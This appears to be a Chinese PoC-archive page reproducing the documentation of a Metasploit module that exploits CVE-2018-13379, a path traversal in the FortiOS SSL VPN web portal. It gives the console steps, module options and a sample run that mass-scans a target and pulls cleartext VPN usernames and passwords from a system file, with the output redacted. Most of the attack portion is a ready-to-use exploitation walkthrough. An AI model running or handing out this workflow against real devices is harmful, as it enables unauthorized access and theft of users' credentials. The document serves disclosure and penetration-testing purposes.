关联漏洞
标题:Fortinet FortiOS 路径遍历漏洞 (CVE-2018-13379)Description:Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 Fortinet FortiOS 5.6.3版本至5.6.7版本和6.0.0版本至6.0.4版本中的SSL VPN Web门户存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
Description
This module massively scan and exploit a path traversal vulnerability in the FortiOS SSL VPN web portal may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests (CVE-2018-13379).
介绍
FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
A path traversal vulnerability in the FortiOS SSL VPN web portal may allow an unauthenticated
attacker to download FortiOS system files through specially crafted HTTP resource requests.
## Vulnerable Application
This module reads logins and passwords in clear text from the `/dev/cmdb/sslvpn_websession` file.
This vulnerability affects (FortiOS 5.4.6 to 5.4.12, FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4).
## Verification Steps
1. Start msfconsole
2. Do: use auxiliary/scanner/http/fortios_vpnssl_traversal_leak
3. Do: set RHOSTS [IP]
4. Do: set RPORT 10443
5. Do: run
## Options
### DUMP_FORMAT
Dump format. (Accepted: raw, ascii)
### STORE_CRED
Store credential into the Metasploit database.
## Scenarios
### Usages
You can scan and get all credentials on the remote target when you run the following command:
```
msf6 auxiliary(scanner/http/fortios_vpnssl_traversal_leak) > options
Module options (auxiliary/scanner/http/fortios_vpnssl_traversal_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_FORMAT raw yes Dump format. (Accepted: raw, ascii)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS XXX.XX.XXX.X yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 10443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
STORE_CRED true no Store credential into the database.
TARGETURI /remote yes Base path
THREADS 16 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/fortios_vpnssl_traversal_leak) > run
[*] https://XXX.XX.XXX.X:10443 - Trying to connect.
[+] https://XXX.XX.XXX.X:10443 - Vulnerable!
[+] https://XXX.XX.XXX.X:10443 - File saved to /home/mekhalleh/.msf4/loot/20201216194020_default_XXX.XX.XXX.X__667507.txt
[+] https://XXX.XX.XXX.X:10443 - 1 credential(s) found!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/fortios_vpnssl_traversal_leak) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
XXX.XX.XXX.X XXX.XX.XXX.X 10443/tcp (https) redacted redacted Password
msf6 auxiliary(scanner/http/fortios_vpnssl_traversal_leak) >
```
文件快照
[4.0K] /data/pocs/09b150cfe7de891953753f1af1fbe713c768e5c8
├── [2.7K] fortios_vpnssl_traversal_leak.md
├── [5.1K] fortios_vpnssl_traversal_leak.rb
└── [ 32] README.md -> fortios_vpnssl_traversal_leak.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。